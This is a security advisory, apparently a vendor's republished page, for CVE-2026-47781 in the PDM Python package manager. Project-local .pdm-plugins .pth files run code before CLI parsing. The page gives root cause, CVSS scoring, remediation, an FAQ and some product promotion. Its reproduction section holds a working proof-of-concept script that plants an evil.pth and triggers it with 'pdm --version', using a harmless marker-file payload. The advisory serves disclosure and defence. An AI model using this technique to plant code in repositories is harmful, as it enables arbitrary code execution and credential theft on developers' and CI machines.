Summary
PDM: Project-Controlled .pdm-plugins Content Executes Before CLI Parsing
PDM automatically loads project-local plugin paths from .pdm-plugins during Core initialization. Because this path is added via site.addsitedir(), attacker-controlled .pth files inside the project plugin directory are processed and can execute Python code before normal CLI handling begins.
This allows arbitrary code execution with the privileges of the user running pdm from an untrusted repository checkout.
Affected Behavior
- Trigger does not require
pdm install --plugins - A low-impact command such as
pdm --versionis sufficient - Impact is strongest in CI, privileged shells, and automation contexts
Affected Code
src/pdm/core.py:74-82src/pdm/core.py:310-333src/pdm/core.py:335-352
Technical Details
Core.__init__() calls load_plugins() before ordinary command execution. load_plugins() calls _add_project_plugins_library(), which derives the project-local .pdm-plugins library path and adds it through site.addsitedir().
On CPython, site.addsitedir() processes .pth files found in the added directory. .pth lines beginning with import are executed immediately. This creates a trust-boundary break: project-controlled files execute before the user explicitly opts into plugin installation or plugin loading.
Reproduction
PoC:
# Replace this with a Python interpreter that can run `python -m pdm`.
PDM_PY=/path/to/python-with-pdm
tmpdir=$(mktemp -d)
cat > "$tmpdir/pyproject.toml" <<'EOF'
[project]
name = "plugin-autoload-demo"
version = "0.0.1"
EOF
purelib=$(TMPDIR_ROOT="$tmpdir/.pdm-plugins" "$PDM_PY" - <<'PY'
import os
import sys
import sysconfig
base = os.environ["TMPDIR_ROOT"]
scheme_names = sysconfig.get_scheme_names()
if (sys.platform == "darwin" and "osx_framework_library" in scheme_names) or sys.platform == "linux":
scheme = "posix_prefix"
elif sys.version_info < (3, 10):
scheme = "nt" if os.name == "nt" else "posix_prefix"
else:
scheme = sysconfig.get_default_scheme()
replace_vars = {"base": base, "platbase": base}
print(sysconfig.get_path("purelib", scheme, replace_vars))
PY
)
mkdir -p "$purelib"
marker="$tmpdir/plugin-autoload-marker.txt"
printf '%s\n' "import pathlib; pathlib.Path(r'$marker').write_text('project plugin autoload executed', encoding='utf-8')" > "$purelib/evil.pth"
(
cd "$tmpdir" &&
"$PDM_PY" -m pdm --version
)
cat "$marker"
Expected result:
- A temporary project is created
- An
evil.pthfile is placed under.pdm-plugins - Running
pdm --versioncreates a marker file before CLI exit
Observed output from local validation:
PDM, version 2.26.9
--- marker ---
project plugin autoload executed
Severity
High
CVSS v4.0
- Base score:
8.4(High) - Vector:
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Rationale:
AV:L: exploitation occurs through local execution ofpdmagainst attacker-controlled repository contentAC:L: no special bypass or race is requiredAT:N: no external precondition beyond the vulnerable workflow is requiredPR:N: the attacker does not need privileges on the victim hostUI:A: the victim must actively run apdmcommand in the malicious checkoutVC:H/VI:H/VA:H: successful exploitation yields arbitrary code execution as the invoking userSC:N/SI:N/SA:N: the score is kept to same-system impact only
Root Cause
Project-local plugin paths are implicitly trusted and loaded too early, and .pth processing is inherited from site.addsitedir().
Recommended Remediation
- Do not auto-load project-local
.pdm-pluginsby default - Avoid
site.addsitedir()for project-controlled plugin paths - If project plugins must be supported, require explicit opt-in such as
--enable-project-plugins - Explicitly prevent
.pthexecution when loading project plugin paths
Disclosure Notes
This issue is a strong standalone CVE candidate because it yields direct code execution from repository-controlled files without requiring the victim to run a project script explicitly.
Impact
- Arbitrary code execution as the invoking user
- Potential credential theft, persistence, or workspace tampering
- Potential privilege escalation when
pdmis run viasudo, root-owned CI jobs, or privileged service accounts
Untrusted input is evaluated as executable code within the application's runtime environment. Typical impact: arbitrary code execution within the application's privilege context.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Already deployed Kodem?
See it in your environmentNew to Kodem? Get a demo →Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-47781? CVE-2026-47781 is a high-severity code injection vulnerability in pdm (pip), affecting versions <= 2.26.9. It is fixed in 2.27.0. Untrusted input is evaluated as executable code within the application's runtime environment.
- Which versions of pdm are affected by CVE-2026-47781? pdm (pip) versions <= 2.26.9 is affected.
- Is there a fix for CVE-2026-47781? Yes. CVE-2026-47781 is fixed in 2.27.0. Upgrade to this version or later.
- Is CVE-2026-47781 exploitable, and should I be worried? Whether CVE-2026-47781 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-47781 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-47781? Upgrade
pdmto 2.27.0 or later.